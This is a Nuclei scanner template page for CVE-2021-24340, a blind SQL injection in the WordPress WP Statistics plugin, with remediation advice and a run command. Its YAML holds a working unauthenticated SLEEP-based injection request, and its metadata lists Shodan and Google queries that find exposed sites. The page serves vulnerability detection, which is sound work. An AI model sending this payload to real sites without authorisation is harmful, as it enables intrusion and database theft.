Skip to content
Nuclei Templates

WordPress Statistics <13.0.8 - Blind SQL Injection

ID: CVE-2021-24340

Severity: high

Author: lotusdll,j4vaovo

Tags: time-based-sqli,cve2021,cve,wp-plugin,unauth,wpscan,wordpress,sqli,blind,edb,veronalabs

Description

Section titled “Description”

WordPress Statistic plugin versions prior to version 13.0.8 are affected by an unauthenticated time-based blind SQL injection vulnerability.

YAML Source

Section titled “YAML Source”
id: CVE-2021-24340


info:
  name: WordPress Statistics <13.0.8 - Blind SQL Injection
  author: lotusdll,j4vaovo
  severity: high
  description: WordPress Statistic plugin versions prior to version 13.0.8 are affected by an unauthenticated time-based blind SQL injection vulnerability.
  remediation: |
    Update to WordPress Statistics plugin version 13.0.8 or later to mitigate the vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/49894
    - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
    - https://github.com/Udyz/WP-Statistics-BlindSQL
    - https://wpscan.com/vulnerability/d2970cfb-0aa9-4516-9a4b-32971f41a19c
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24340
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-24340
    cwe-id: CWE-89
    epss-score: 0.01606
    epss-percentile: 0.8741
    cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: veronalabs
    product: wp_statistics
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/wp-statistics/
    fofa-query: body=/wp-content/plugins/wp-statistics/
    publicwww-query: /wp-content/plugins/wp-statistics/
    google-query: inurl:/wp-content/plugins/wp-statistics
  tags: time-based-sqli,cve2021,cve,wp-plugin,unauth,wpscan,wordpress,sqli,blind,edb,veronalabs


http:
  - raw:
      - |
        GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1
        Host: {{Hostname}}
      - |
        @timeout: 15s
        GET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'contains(body_1, "WP Statistics")'
        condition: and


      - type: dsl
        dsl:
          - 'duration_2>=7'
          - 'status_code_2 == 500'
          - 'contains(body_2, ">WordPress &rsaquo; Error<") && contains(body_2, ">Your request is not valid.<")'
        condition: and
# digest: 4b0a00483046022100e09130ac97ec046c863b852dfe8d2d8efb70faefc6f694c9e9b3e63c23c92d55022100e8ae16b1cc6bc59bf46af3242e35d486927e9fab30a750bf02257170e7930291:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24340.yaml"

View on Github